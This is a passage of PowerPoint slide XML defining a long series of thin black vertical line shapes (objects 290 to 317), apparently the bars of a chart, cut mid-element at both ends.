          <p:cNvPr id="290" name="object 290"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4687633" y="2504690"/>
            <a:ext cx="0" cy="3227664"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1628775">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1628767"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="object 291"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4684893" y="2504108"/>
            <a:ext cx="2517" cy="3228923"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1629410">
                <a:moveTo>
                  <a:pt x="622" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622" y="1629065"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="object 292"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4715539" y="2449979"/>
            <a:ext cx="0" cy="3283030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1656714">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1656380"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="object 293"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4714965" y="2449979"/>
            <a:ext cx="1258" cy="3283030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="1656714">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="1656380"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294" name="object 294"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743391" y="2340596"/>
            <a:ext cx="0" cy="3392508"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1711960">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1711578"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="object 295"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743117" y="2341637"/>
            <a:ext cx="2517" cy="3391250"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1711325">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="1711053"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="object 296"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4771297" y="2115374"/>
            <a:ext cx="0" cy="3617752"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1825625">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1825232"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="object 297"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4769640" y="2116415"/>
            <a:ext cx="2517" cy="3616492"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1824989">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="1824707"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="object 298"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4798657" y="1830069"/>
            <a:ext cx="0" cy="3903397"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1969770">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1969205"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="object 299"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4798385" y="1828975"/>
            <a:ext cx="1258" cy="3903397"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="1969770">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="1969757"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="object 300"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4826509" y="1837609"/>
            <a:ext cx="0" cy="3895847"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1965960">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1965395"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="object 301"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824058" y="1838113"/>
            <a:ext cx="2517" cy="3894589"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1965325">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="1965146"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="object 302"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4854415" y="1839207"/>
            <a:ext cx="0" cy="3893329"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1964689">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1964594"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="object 303"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4854142" y="1838908"/>
            <a:ext cx="0" cy="3894589"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1965325">
                <a:moveTo>
                  <a:pt x="0" y="1964469"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1964745"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="object 304"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4882321" y="1796845"/>
            <a:ext cx="0" cy="3936114"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1986280">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1985966"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="object 305"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4882049" y="1796264"/>
            <a:ext cx="2517" cy="3936114"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1986280">
                <a:moveTo>
                  <a:pt x="549" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="549" y="1986264"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="object 306"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4910175" y="1799526"/>
            <a:ext cx="0" cy="3933598"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1985010">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1984613"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307" name="object 307"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4908818" y="1797563"/>
            <a:ext cx="1258" cy="3934856"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="1985645">
                <a:moveTo>
                  <a:pt x="273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="273" y="1985609"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="object 308"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937533" y="1862245"/>
            <a:ext cx="0" cy="3870680"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1953260">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1952968"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="object 309"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937260" y="1861150"/>
            <a:ext cx="2517" cy="3871939"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1953895">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="1953520"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="object 310"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4965439" y="2020983"/>
            <a:ext cx="0" cy="3712128"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1873250">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1872864"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="object 311"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4963235" y="2020983"/>
            <a:ext cx="2517" cy="3712128"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1873250">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="1872864"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="object 312"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4993293" y="2200627"/>
            <a:ext cx="0" cy="3532185"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1782445">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1782211"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="object 313"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4993021" y="2201966"/>
            <a:ext cx="1258" cy="3530926"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="1781810">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="1781535"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="object 314"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5021199" y="2454795"/>
            <a:ext cx="0" cy="3277998"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1654175">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1653950"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="object 315"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5020925" y="2457810"/>
            <a:ext cx="2517" cy="3275481"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="1652905">
                <a:moveTo>
                  <a:pt x="622" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622" y="1652429"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="object 316"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5049051" y="2651072"/>
            <a:ext cx="0" cy="3081696"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="1555114">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1554903"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317" name="object 317"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5047986" y="2652413"/>
            <a:ext cx="1258" cy="3080437"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="1554480">
                <a:moveTo>
